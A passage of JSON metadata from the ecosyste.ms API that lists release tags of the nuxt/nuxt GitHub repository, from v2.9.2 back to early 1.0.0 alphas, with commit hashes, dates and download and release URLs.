_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/n